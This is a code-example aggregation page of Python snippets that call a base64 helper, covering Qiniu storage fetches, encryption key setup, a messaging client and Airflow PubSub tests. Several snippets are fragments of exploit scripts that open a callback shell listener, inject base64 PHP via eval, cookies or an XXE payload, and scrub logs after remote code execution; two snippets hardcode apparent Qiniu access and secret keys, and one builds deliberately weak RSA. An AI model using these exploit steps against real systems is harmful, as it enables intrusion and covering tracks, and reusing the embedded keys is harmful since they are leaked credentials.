Exemplo n.º 1
0
def qiniufetch(url,bucket,filename):
    """调用七牛的fetch API 将url的图片存储到七牛"""
    from base64 import urlsafe_b64encode as b64e
    from qiniu.auth import digest
    access_key = "Mm3eTLInPMoWnh2uBpZ8MarSQw1esZdaCmQgqapu"
    secret_key = "3msmgC6ZISF9tjJcXsYZcr10tOjG13fX0-pdtMKb"

    encoded_url = b64e(url)
    dest_entry = "%s:%s" % (bucket, filename)
    encoded_entry = b64e(dest_entry.encode('utf-8'))

    api_host = "iovip.qbox.me"
    api_path = "/fetch/%s/to/%s" % (encoded_url, encoded_entry)

    mac = digest.Mac(access=access_key, secret=secret_key)
    client = digest.Client(host=api_host, mac=mac)

    ret, err = client.call(path=api_path)
    if err is not None:
        print "Fetch image file\"%s\" failed" % url
        print err
        return None
    else:
        print "Fetch \"%s\" to qiniu \"%s\" success!" % (url,dest_entry)
        return "http://%s.qiniudn.com/%s" % (bucket,quote(filename.encode('utf-8')))
    pass
Exemplo n.º 2
0
def new_passphrase(config, passphrase, salt=None):
    if salt is None:
        salt = Random.new().read(8)  # 64-bit salt
    pbkdf2 = PBKDF2(passphrase, salt, iterations=1 << 14)
    config['passphrase_salt'] = b64e(salt)
    config['passphrase_aes_key'] = b64e(pbkdf2.read(32))  # AES256
    config['passphrase_sha256hmac_key'] = b64e(pbkdf2.read(SHA256.digest_size))
Exemplo n.º 3
0
def qiniufetch(url,bucket,filename):
    """调用七牛的fetch API 将url的图片存储到七牛"""
    from base64 import urlsafe_b64encode as b64e
    from qiniu.auth import digest

    access_key = "qS-5BhmoJIM5WITHYwzooxlTiT70vWP9fyNXd_fT"
    secret_key = "5JOR1EiOXN-pbqvNoAf4v4YLmnSMB2rvqy13u3f5"

    encoded_url = b64e(url)
    dest_entry = "%s:%s" % (bucket, filename)
    encoded_entry = b64e(dest_entry.encode('utf-8'))

    api_host = "iovip.qbox.me"
    api_path = "/fetch/%s/to/%s" % (encoded_url, encoded_entry)

    mac = digest.Mac(access=access_key, secret=secret_key)
    client = digest.Client(host=api_host, mac=mac)

    ret, err = client.call(path=api_path)
    if err is not None:
        print "Fetch image file\"%s\" failed" % url
        print err
        return None
    else:
        print "Fetch \"%s\" to qiniu \"%s\" success!" % (url,dest_entry)
        return "http://%s.qiniudn.com/%s" % (bucket,urllib.quote(filename.encode('utf-8')))
Exemplo n.º 4
0
def init(config, crypto='aes'):
    if 'crypto' in config:
        crypto = config['crypto']
    config['crypto'] = crypto
    rng = Random.new()
    if 'aes_key' not in config:
        config['aes_key'] = b64e(rng.read(32))  # AES256
    if 'sha256hmac_key' not in config:
        config['sha256hmac_key'] = b64e(rng.read(SHA256.digest_size))
Exemplo n.º 5
0
Arquivo: app.py Projeto: hmac/msg
def login():
    name = request.form['username']
    app.logger.info("LOGIN: %s" % (name))
    client_key = key_for(name)
    if client_key is None:
        app.logger.warn("No key exists for user %s. User may not be registered." % name)
        abort(401)
    secret = auth.generate_secret()
    p1 = auth.encrypt(secret, client_key)
    p2 = auth.encrypt(secret, auth.key())
    return json.dumps({'client_secret': b64e(p1), 'server_secret': b64e(p2)})
 def do_pubkey(self, data):
     print "Generating RSA key..."
     #self.rsa = RSA.generate(4096)
     # If you find p and q which this is fast for, put them in here.
     #p, q = Crypto.Util.number.getPrime(2048), Crypto.Util.number.getPrime(2048) #379, Crypto.Util.number.getPrime(4095)
     #e = 1
     #N = p*q
     #d = Crypto.Util.number.inverse(e, (q-1)*(p-1))
     num_cop = 20
     bits = (4096 // num_cop) + 2
     #ps = [Crypto.Util.number.getPrime(bits) for i in range(x)]
     ps = [gmpy2.mpz(Crypto.Util.number.getPrime(bits)) for i in range(num_cop)]
     e  = gmpy2.mpz(Crypto.Util.number.getPrime(32))
     N = 1
     for x in ps:
         N *= x
     #next x
     #print('e', e, len(hex(e)[2:]) * 4)
     self.v = four1c2.fuckedRSA(ps, e)
     print('e=', self.v.e, len(hex(self.v.e)[2:])*4)
     
     self.rsa = RSA.construct((long(N), long(self.v.e), long(self.v.d)))
     pub = self.rsa.publickey()
     self.state = 'challange'
     self.sendLine(b64e(pub.exportKey(format='DER')))
Exemplo n.º 7
0
def write_key_to_file(key):
    """ Write new HMACing key """
    try:
        with open(KEY_FILE, 'wb') as key_file:
            key_file.write(b64e(key))
    except:
        logging.warning("error writing to key file")
Exemplo n.º 8
0
 def handle_put(self, conn, body=None, length=None, mime=None, name=None):
   droid.log("Got %s" % name)
   droid.eventPost("taxi-server", json.dumps({
       "name": "got-content",
       "body": b64e(body),
       "length": length,
       "mime": mime or mimetypes.guess_type(name)[0],
       "file": name
   }))
 def _generate_messages(self, count):
     messages = []
     for i in range(1, count + 1):
         messages.append({
             'ackId': '%s' % i,
             'message': {
                 'data': b64e('Message {}'.format(i).encode('utf8')),
                 'attributes': {'type': 'generated message'}
             }
         })
     return messages
Exemplo n.º 10
0
def start_pain_train(t, s):
    if we_can_set_settings(t, s):
        print "(+) updated the settings!"
        if we_can_upload(t, s):
            print "(+) wrote php code!"
            print "(+) attempting race condition..."
            r = Thread(target=race, args=(t,))
            r.start()
            if we_won_race(t, s, r):
                print "(+) won the race!"
                if we_can_exec_php(t, b64e('`rm pwn.php`;echo "pwn";')):
                    print "(+) rce is proven!"
                    if we_can_clean_up(t, s) and we_can_clear_logs(t, s):
                        print "(+) deleted the image and scrubbed the logs!"
                        exec_code(t)
Exemplo n.º 11
0
Arquivo: client2.py Projeto: hmac/msg
def send_message(name, msg):
    keyA, body = auth.aes_encrypt(msg)
    body = b64e(body)
    recipient_key = key_for(name)
    if recipient_key is None:
      return False
    keyA2 = keyA
    keyA = b64e(auth.encrypt(keyA, recipient_key))
    keyA2 = b64e(auth.encrypt(keyA2, auth.public_key()))
    payload = {'sender': username, 'recipient': name, 'body': body, 'key': keyA, 'sender_key': keyA2}
    sig = b64e(str(auth.sign(username+name+body)))
    payload['signature'] = str(sig)
    keyB, payload = auth.aes_encrypt(json.dumps(payload))
    payload = b64e(payload)
    keyB = b64e(auth.encrypt(keyB, auth.server_key()))
    post("messages", {'key': keyB, 'payload': payload})
def hex_to_b64(h):
    return b64e(unhexlify(h))
Exemplo n.º 13
0
def exec_code(target):
    handlerthr = Thread(target=handler, args=(cb_port,))
    handlerthr.start()
    we_can_exec_php(target, b64e(build_php_code()))
Exemplo n.º 14
0
 def parsestr(userarg):
  userpass=userarg.split(':')
  if len(userpass)==1:
   pwd=self.console.prompt('Enter host password for user \'%s\': '%userpass[0],1)
   userpass.append(pwd)
  return b64e(':'.join(userpass))[:-1]
Exemplo n.º 15
0
# coding=utf-8
import sys
sys.path.insert(0, "../../")

from base64 import urlsafe_b64encode as b64e
from qiniu.auth import digest

access_key = ""
secret_key = ""

src_url = ""
dest_bucket = ""
dest_key = ""

encoded_url = b64e(src_url)
dest_entry = "%s:%s" % (dest_bucket, dest_key)
encoded_entry = b64e(dest_entry)

api_host = "iovip.qbox.me"
api_path = "/fetch/%s/to/%s" % (encoded_url, encoded_entry)

mac = digest.Mac(access=access_key, secret=secret_key)
client = digest.Client(host=api_host, mac=mac)

ret, err = client.call(path=api_path)
if err is not None:
    print "failed"
    print err
else:
    print "success"
Exemplo n.º 16
0
def suntzu_omfg_no_one_can_steal_my_software_yo():
    handlerthr = Thread(target=handler, args=(lp,))
    handlerthr.start()
    target = "http://127.0.0.1/openadmin/conf/config.php?c=eval%%28base64_decode%%28%%27%s%%27%%29%%29%%3b" % b64e(build_php_code())
    p = "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [  <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"%s\" >]><foo>&xxe;</foo>" % target
    f = [('importfile', ('suntzu-rgod-is-so-elite', p, 'text/plain'))]
    r = requests.post("%s" % t, files=f)
Exemplo n.º 17
0
Arquivo: client2.py Projeto: hmac/msg
def login():
    global cookie
    resp = post("login", {'username': username})
    if resp.status_code != 200:
      return False
    data = json.loads(resp.text)
    client_secret = b64d(data['client_secret'])
    secret = auth.decrypt(client_secret)
    sig = auth.sign(secret)
    resp = post("authorise", {'username': username, 'server_secret': data['server_secret'], 'signature': b64e(str(sig))})
    if resp.status_code == 200:
      cookie = resp.cookies
      return True
    return False
Exemplo n.º 18
0
# coding=utf-8
import sys
sys.path.insert(0, "../../")

from base64 import urlsafe_b64encode as b64e
from qiniu.auth import digest

access_key = ""
secret_key = ""

bucket = ""
key = ""

entry = "%s:%s" % (bucket, key)
encoded_entry = b64e(entry)


api_host = "iovip.qbox.me"
api_path = "/prefetch/%s" % (encoded_entry)

mac = digest.Mac(access=access_key, secret=secret_key)
client = digest.Client(host=api_host, mac=mac)

ret, err = client.call(path=api_path)
if err is not None:
    print "failed"
    print err
else:
    print "success"
try:
    from unittest import mock
except ImportError:
    try:
        import mock
    except ImportError:
        mock = None

TASK_ID = 'test-task-id'
TEST_PROJECT = 'test-project'
TEST_TOPIC = 'test-topic'
TEST_SUBSCRIPTION = 'test-subscription'
TEST_MESSAGES = [
    {
        'data': b64e(b'Hello, World!'),
        'attributes': {'type': 'greeting'}
    },
    {'data': b64e(b'Knock, knock')},
    {'attributes': {'foo': ''}}]
TEST_POKE_INTERVAl = 0


class PubSubTopicCreateOperatorTest(unittest.TestCase):

    @mock.patch('airflow.contrib.operators.pubsub_operator.PubSubHook')
    def test_failifexists(self, mock_hook):
        operator = PubSubTopicCreateOperator(task_id=TASK_ID,
                                             project=TEST_PROJECT,
                                             topic=TEST_TOPIC,
                                             fail_if_exists=True)
Exemplo n.º 20
0
def exec_code():
    phpkodez = b64e(build_php_code())
    handlerthr = Thread(target=handler, args=(lport,))
    handlerthr.start()
    requests.get("%s/d4d/offsec.php" % (target), cookies={"awae": phpkodez})